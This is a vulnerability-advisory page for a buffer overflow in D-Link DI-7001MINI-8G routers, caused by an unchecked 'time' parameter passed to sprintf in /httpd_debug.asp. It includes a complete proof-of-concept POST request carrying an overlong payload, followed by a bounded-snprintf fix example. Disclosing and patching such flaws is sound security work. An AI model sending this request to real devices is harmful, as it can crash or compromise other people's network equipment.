| Title | D-Link DI-7001MINI-8G <=19.09.19A1 Buffer Overflow |
|---|
| Description | A critical stack-based buffer overflow vulnerability has been identified in D-Link DI-7001MINI-8G devices. The flaw exists in the handling of HTTP POST requests to the `httpd_debug.asp` endpoint. Specifically, the `time` parameter is user-controllable and is directly passed to the `sprintf` function without proper length validation, as demonstrated in the vulnerable code snippet: `sprintf(_ret:0_msg:_ok__, "echo \"httpd_debug time %s\" >/dev/console", parm);`. By sending a specially crafted, overly long value for this parameter, a remote attacker can overflow the fixed-size buffer. Successful exploitation may lead to a denial of service (DoS) or, under certain circumstances, potential arbitrary code execution.
POC:
POST /httpd_debug.asp HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: wysLanguage=CN; userid=admin; gw_userid=admin,gw_passwd=E3A7F1B4C8D2E5F7A0B3C6D9E1F4A7B2
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 276
time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb |
|---|
| Source | https://github.com/666324/dlink-DI-7001MINI-8G-vuln |
|---|
| User | Zheng (UID 97999) |
|---|
| Submission | 11/05/2026 04:02 (25 days ago) |
|---|
| Moderation | 31/05/2026 16:13 (21 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 367549 [D-Link DI-7001 MINI up to 19.09.19A1 API /httpd_debug.asp sprintf Time buffer overflow] |
|---|
| Points | 20 |
|---|
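The missing length validation named in the description, shown as a bounded form of the quoted `sprintf` call. This is an added example, not D-Link firmware code and not from the submitter's repository; the function names, the 128-byte buffer size and the digits-only rule for `time` are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DEBUG_CMD_MAX  128  /* assumed size; the page does not give the real one */
#define TIME_PARAM_MAX 10   /* assumed: "time" is a short decimal value */

/* Accept only 1..TIME_PARAM_MAX decimal digits. Returns 0 if valid, -1 if not. */
int validate_time_param(const char *parm)
{
    size_t len;
    if (parm == NULL)
        return -1;
    for (len = 0; parm[len] != '\0'; len++) {
        if (len >= TIME_PARAM_MAX || !isdigit((unsigned char)parm[len]))
            return -1;
    }
    return len == 0 ? -1 : 0;
}

/* Bounded form of the sprintf() call quoted in the description.
 * Returns the number of bytes written, or -1 with out[] emptied. */
int build_debug_cmd(char *out, size_t out_size, const char *parm)
{
    int n;
    if (out == NULL || out_size == 0)
        return -1;
    out[0] = '\0';
    if (validate_time_param(parm) != 0)
        return -1;
    n = snprintf(out, out_size,
                 "echo \"httpd_debug time %s\" >/dev/console", parm);
    if (n < 0 || (size_t)n >= out_size) {
        out[0] = '\0';   /* truncated output is rejected, not passed on */
        return -1;
    }
    return n;
}

int main(void)
{
    char cmd[DEBUG_CMD_MAX], oversized[300];
    memset(oversized, 'a', sizeof oversized - 1);   /* constructed long input */
    oversized[sizeof oversized - 1] = '\0';
    printf("valid:     %d\n", build_debug_cmd(cmd, sizeof cmd, "30"));
    printf("oversized: %d\n", build_debug_cmd(cmd, sizeof cmd, oversized));
    return 0;
}
```

Checking the `snprintf` return value against the buffer size matters as much as the bound itself: a silently truncated line would otherwise be used as if it were complete.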